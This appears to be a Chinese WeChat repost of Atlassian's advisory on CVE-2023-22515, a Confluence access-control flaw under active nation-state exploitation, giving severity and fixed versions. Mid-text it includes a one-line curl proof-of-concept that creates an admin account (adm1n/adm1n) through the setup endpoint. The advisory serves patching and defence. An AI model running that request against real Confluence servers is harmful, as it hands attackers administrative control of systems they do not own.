漏洞总结
Atlassian 已意识到少数客户报告的一个问题,外部攻击者可能利用可公开访问的 Confluence 数据中心和服务器实例中的先前未知的漏洞来创建未经授权的 Confluence 管理员帐户并访问 Confluence 实例。
更新:我们有证据表明,一个已知的民族国家行为者正在积极利用 CVE-2023-22515,并继续与我们的合作伙伴和客户密切合作进行调查。
Atlassian Cloud 站点不受此漏洞的影响。如果您的 Confluence 站点是通过atlassian.net域访问的,则该站点由 Atlassian 托管,并且不易受到此问题的影响。
CVSS 10:需要采取紧急行动
1. 升级您的实例
2. 进行全面的威胁检测
下面列出的可公开访问的 Confluence 数据中心和服务器版本面临严重风险,需要立即关注。有关详细说明,请参阅“您需要做什么”。
严重性
根据 Atlassian 严重性级别中发布的等级,Atlassian 将此漏洞的严重性级别评定为 Critical CVSS 10。该量表使我们能够将严重程度分为严重、高、中或低。这是我们的评估,您应该评估其对您自己的 IT 环境的适用性。
PoC for CVE-2023-22515: curl -k -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=adm1n&fullName=admin&email=admin@confluence&password=adm1n&confirm=adm1n&setup-next-button=Next" http://confluence/setup/setupadministrator.action (login with adm1n/adm1n)
Atlassian 建议您将每个受影响的安装升级到下面列出的固定版本(或任何更高版本)之一。
产品固定版本
Confluence 数据中心和 Confluence 服务器 8.3.3 或更高版本
8.4.3 或更高版本
8.5.2(长期支持版本)或更高版本
原文始发于微信公众号(TtTeam):CVE-2023-22515 - Confluence 数据中心和服务器中的访问控制漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论